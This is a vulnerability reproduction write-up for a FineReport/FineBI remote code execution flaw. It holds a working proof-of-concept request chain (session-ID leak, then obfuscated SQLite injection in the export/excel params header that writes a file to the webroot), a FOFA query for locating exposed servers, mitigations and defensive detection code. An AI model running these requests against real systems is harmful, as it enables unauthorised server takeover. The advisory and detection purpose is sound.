FineReport (Fanruan Report) front-end remote code execution vulnerability reproduction

Vulnerability overview

Vulnerability description

Fanruan Report (FineReport) is a professional enterprise-grade reporting tool focused on data visualization and analysis. It supports connections to multiple data sources and can quickly build complex reports and dynamic dashboards. Through drag-and-drop operation and flexible customization, it helps enterprises make efficient data-driven decisions and gain business insight.

In December 2025, the Chaitin Security Emergency Response Center detected a remote code execution vulnerability in Fanruan Report and the Data Decision System. Analysis shows that an attacker can use the export/excel interface to construct SQL injection statements that write a webshell and thereby gain control of the server. Because the vulnerability can be chained with a SessionID disclosure vulnerability to achieve unauthenticated front-end exploitation, the difficulty of exploitation is low; affected users are advised to remediate as soon as possible.

Overall handling priority: High

Basic information

ThreatBook ID

XVE-2025-46624

Vulnerability type

Remote code execution

Exploitation condition assessment

Network conditions for exploitation

Remote

Security mechanism bypass required

Not required

Requirements on the target system

Privileges required for exploitation

Victim interaction required

Exploitation intelligence

Is the PoC public

Known exploitation activity

Affected scope

Product name

⚫ Fanruan Software Co., Ltd. | FineReport reporting software

⚫ Fanruan Software Co., Ltd. | FineBI business intelligence software

⚫ Fanruan Software Co., Ltd. | FineDataLink

Affected versions

⚫ FineReport: version < 11.5.4.1

⚫ FineBI: version < 7.0.5, version < 6.1.8

⚫ FineDataLink: version < 5.0.4.3, version < 4.2.11.3

Fix patch availability

⚫ FineReport 11.5.4 and earlier (builds dated 2025.09.29 and before)

⚫ FineBI 7.0.4 and earlier (builds dated 2025.09.12 and before)

⚫ FineBI 6.1.7.3 and earlier (builds dated 2025.09.29 and before)

⚫ FineBI 6.0.23.2 and earlier (builds dated 2025.09.26 and before)

⚫ FineDataLink 5.0.4.2 and earlier (builds dated 2025.10.16 and before)

⚫ FineDataLink 4.2.11.2 and earlier (builds dated 2025.10.16 and before)
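To turn the version table above into an inventory check, here is an added Python triage helper; it is not part of the advisory or of any Fanruan tooling. It assumes that each fixed version marks a separate release line identified by its major number (so a 6.x FineBI build is judged against 6.1.8 and a 7.x build against 7.0.5), that a major older than every listed line should conservatively be reported as affected, and the inventory lines it runs over are constructed.

```python
# Added triage helper: applies the advisory's affected-version thresholds to an
# inventory list. Assumption (mine, not the vendor's): each fixed version marks the
# release line that shares its major number, so 6.1.7.3 is judged against 6.1.8
# and 7.0.4 against 7.0.5; a major older than every listed line is reported affected.
FIXED_VERSIONS = {
    "FineReport": ["11.5.4.1"],
    "FineBI": ["7.0.5", "6.1.8"],
    "FineDataLink": ["5.0.4.3", "4.2.11.3"],
}


def parse_version(version: str) -> tuple:
    """'6.1.7.3' -> (6, 1, 7, 3); tuple ordering handles unequal lengths correctly."""
    return tuple(int(part) for part in version.strip().split("."))


def is_affected(product: str, version: str) -> bool:
    """True when the build is older than the first fixed version of its release line."""
    if product not in FIXED_VERSIONS:
        raise ValueError(f"unknown product: {product}")
    ver = parse_version(version)
    fixed = [parse_version(f) for f in FIXED_VERSIONS[product]]
    same_line = [f for f in fixed if f[0] == ver[0]]
    if same_line:
        return ver < min(same_line)
    # No listed line with this major: newer than every fix -> not affected,
    # older than every fix -> conservatively reported as affected.
    return ver < min(fixed)


# Constructed inventory (host product version), not a real environment.
SAMPLE_INVENTORY = """\
report-01 FineReport 11.5.4
report-02 FineReport 11.5.4.1
bi-01 FineBI 6.1.7.3
bi-02 FineBI 7.0.4
bi-03 FineBI 7.0.5
fdl-01 FineDataLink 4.2.11.2
fdl-02 FineDataLink 5.0.4.3
"""


def triage(inventory: str) -> list:
    """Return the hosts whose installed build is still in the affected range."""
    hits = []
    for line in inventory.splitlines():
        host, product, version = line.split()
        if is_affected(product, version):
            hits.append(host)
    return hits


if __name__ == "__main__":
    for host in triage(SAMPLE_INVENTORY):
        print(f"{host}: update required")
```

Feed it the real `product version` pairs from your asset inventory; anything it lists is below the fix threshold for its line and should be upgraded or covered by the temporary mitigations below.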

Temporary mitigations:

  • Projects not deployed through the O&M platform: go to the standalone project node / each cluster project node, enter the project's /webroot/WEB-INF/lib directory, delete the sqlite-related drivers, and restart the project for the change to take effect.

  • Projects deployed through the O&M platform, or projects where the driver cannot be deleted and the project restarted: have an administrator log in to the Fanruan application, open "Management System > Data Connection > Data Connection Management", delete any self-created sqlite-type data connections, and delete the product's built-in sqlite-type data connections FRDemo and BI Demo; this takes effect without restarting the project.

  • Use protective devices to block malicious SQL statements appearing in requests (the full exploitation path and exploitation signatures can be looked up through ThreatBook vulnerability intelligence).

Remediation

Official remediation:

FOFA query:

body="/webroot/decision/" || (body="FineReport" && body="content="FineReport--Web Reporting Tool"") || title="FineReport" || title="FineReport报表" || title="FineBI"

Installation environment

Installer: https://pan.baidu.com/s/1hGxPKnmaScPf8ypjVDwhwQ?pwd=qt2r

Not sure whether it is a version issue, but the exploitation method given online differs from what I reproduced locally.

Reference: https://cn-sec.com/archives/4839141.html

Vulnerability reproduction

Vulnerability PoC

1. Obtain the session id

GET /webroot/ReportServer HTTP/1.1
Host: XXXX
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
viewlets: [{'reportlet':'/'}]
op: getSessionID

2. Build the request using the obtained id

GET /webroot/decision/nx/report/v9/largedataset/export/excel?functionParams=%7B%7D&__parameters__=%7B%7D HTTP/1.1
Host: XXXX
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
sessionID: cd1c0673-ad9f-4261-870c-90736bfe1de4
params: %3Cpd%3E%0A+%3CLargeDatasetExcelExportJS+dsName%3D%221%22%3E%0A%3CParameters%3E%3CParameter%3E%0A%3CAttributes+name%3D%22c%22%2F%3E%3CO+t%3D%22Formula%22%3E%3CAttributes%3E%3C%21%5BCDATA%5Bsql%28%27FRDemo%27%2CCONCATENATE%28%22pr%22%2C%22agm%22%2C%22a+wr%22%2C%22i%22%2C%22t%22%2C%22a%22%2C%22ble%22%2C%22_sch%22%2C%22e%22%2C%22ma%3Do%22%2C%22n%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22dele%22%2C%22t%22%2C%22e+f%22%2C%22r%22%2C%22o%22%2C%22m+sq%22%2C%22li%22%2C%22t%22%2C%22e_sc%22%2C%22he%22%2C%22ma+w%22%2C%22here%22%2C%22+na%22%2C%22m%22%2C%22e%21%22%2C%22%3D%22%2C%22%27s%22%2C%22ql%22%2C%22ite%22%2C%22_s%22%2C%22ta%22%2C%22t%22%2C%221%27%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22an%22%2C%22aly%22%2C%22ze%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22re%22%2C%22p%22%2C%22lac%22%2C%22e+i%22%2C%22nto%22%2C%22+s%22%2C%22ql%22%2C%22ite_%22%2C%22st%22%2C%22at%22%2C%221+va%22%2C%22lu%22%2C%22es%28%27%22%2C%22%27%2C%27123%22%2C%22%27%22%2C%22%29%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22V%22%2C%22A%22%2C%22C%22%2C%22U%22%2C%22U%22%2C%22M%22%2C%22+i%22%2C%22nt%22%2C%22o%28%27%22%2CENV_HOME%2C%22%2F%22%2C%22.%22%2C%22.%22%2C%22%2F%22%2C%22.%22%2C%22%2F%22%2C%22123%22%2C%22.%22%2C%22t%22%2C%22x%22%2C%22t%22%2C%22%27%29%22%29%2C1%29%5D%5D%3E%3C%2FAttributes%3E%3C%2FO%3E%3C%2FParameter%3E%3C%2FParameters%3E%3C%2FLargeDatasetExcelExportJS%3E%3C%2Fpd%3E

3. Access the generated file

GET /webroot/123.txt HTTP/1.1
Host: XXXX
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
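The third temporary mitigation asks protective devices to block malicious SQL in requests, and the two requests above show what that traffic looks like: a getSessionID request against /webroot/ReportServer, then a params header on the export/excel endpoint carrying a URL-encoded formula whose sql() call splits its SQL text into CONCATENATE fragments. As an added example that is not part of the original post or of any Fanruan or vendor product, the Python routine below inspects raw requests with two rules: it flags the session-id request, and on the export endpoint it decodes params, looks for sql() formula calls and joins CONCATENATE string literals before keyword matching, so fragment splitting does not defeat the check. The host name, the sessionID value, the token list and the three sample requests are constructed for the example.

```python
import re
from urllib.parse import quote_plus, unquote_plus

# Paths taken from the requests above
REPORT_SERVER = "/webroot/ReportServer"
EXPORT_PATH = "/webroot/decision/nx/report/v9/largedataset/export/excel"

# Illustrative list of SQLite statements and names that have no place in a report
# formula reaching the export endpoint; extend it from your own telemetry.
SUSPICIOUS_TOKENS = ("pragma", "writable_schema", "vacuum", "attach", "sqlite_")

CONCAT_RE = re.compile(r"CONCATENATE\s*\(", re.IGNORECASE)
SQL_CALL_RE = re.compile(r"\bsql\s*\(", re.IGNORECASE)


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request head into method, path (query stripped) and headers."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = [line for line in head.split("\n") if line.strip()]
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": target.split("?", 1)[0], "headers": headers}


def collapse_concatenate(text: str) -> str:
    """Rewrite CONCATENATE("pr","agma") as "pragma" so split keywords become matchable.
    Only double-quoted literal arguments are joined; non-literal arguments
    (such as ENV_HOME in the request above) are dropped from the joined text."""
    out, pos = [], 0
    while True:
        match = CONCAT_RE.search(text, pos)
        if not match:
            out.append(text[pos:])
            return "".join(out)
        out.append(text[pos:match.start()])
        i, depth, in_str, chars = match.end(), 1, False, []
        while i < len(text) and depth > 0:  # scan to the matching close paren
            ch = text[i]
            if in_str:
                if ch == '"':
                    in_str = False
                else:
                    chars.append(ch)
            elif ch == '"':
                in_str = True
            elif ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            i += 1
        out.append('"' + "".join(chars) + '"')
        pos = i


def inspect_request(raw: str) -> list:
    """Return findings for one request; an empty list means nothing was flagged."""
    req = parse_request(raw)
    hdr = req["headers"]
    findings = []
    # Rule 1: the session-id disclosure request (step 1 above)
    if req["path"] == REPORT_SERVER and hdr.get("op", "").lower() == "getsessionid":
        findings.append("op=getSessionID against /webroot/ReportServer")
    # Rule 2: sql() formula calls inside the params header of the export endpoint (step 2)
    if req["path"] == EXPORT_PATH and "params" in hdr:
        decoded = unquote_plus(hdr["params"])
        if SQL_CALL_RE.search(decoded):
            findings.append("sql() formula call in export params")
            flat = collapse_concatenate(decoded).lower()
            for token in SUSPICIOUS_TOKENS:
                if token in flat:
                    findings.append(f"suspicious SQLite token after de-obfuscation: {token}")
    return findings


# Constructed sample requests modelled on the shapes above (not captured traffic);
# host name and sessionID value are placeholders.
SAMPLE_SESSION_REQ = (
    "GET /webroot/ReportServer HTTP/1.1\n"
    "Host: reporting.example.internal\n"
    "viewlets: [{'reportlet':'/'}]\n"
    "op: getSessionID\n"
)
_SPLIT_FORMULA = (
    '<pd><O t="Formula"><Attributes><![CDATA['
    "sql('FRDemo',CONCATENATE(\"pr\",\"agm\",\"a tab\",\"le_list\"),1)"
    "]]></Attributes></O></pd>"
)
_BENIGN_FORMULA = '<pd><O t="Formula"><Attributes><![CDATA[SUM(1,2)]]></Attributes></O></pd>'
SAMPLE_EXPORT_REQ = (
    f"GET {EXPORT_PATH}?functionParams=%7B%7D HTTP/1.1\n"
    "Host: reporting.example.internal\n"
    "sessionID: 00000000-0000-0000-0000-000000000000\n"
    f"params: {quote_plus(_SPLIT_FORMULA)}\n"
)
SAMPLE_BENIGN_REQ = (
    f"GET {EXPORT_PATH} HTTP/1.1\n"
    "Host: reporting.example.internal\n"
    f"params: {quote_plus(_BENIGN_FORMULA)}\n"
)
```

Running `inspect_request` over the session sample yields one finding, over the export sample two (the sql() call and the re-joined `pragma`), and over the benign export none. In a WAF or log pipeline the same two rules apply: alert on getSessionID requests that arrive without an authenticated session, and normalise CONCATENATE fragments before matching SQL keywords in the decoded params header.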

Disclaimer

This is intended only to describe and detect possible security issues. Any direct or indirect consequences and losses caused by distributing or using the information provided in this security advisory are the responsibility of the user; the author accepts no liability for them.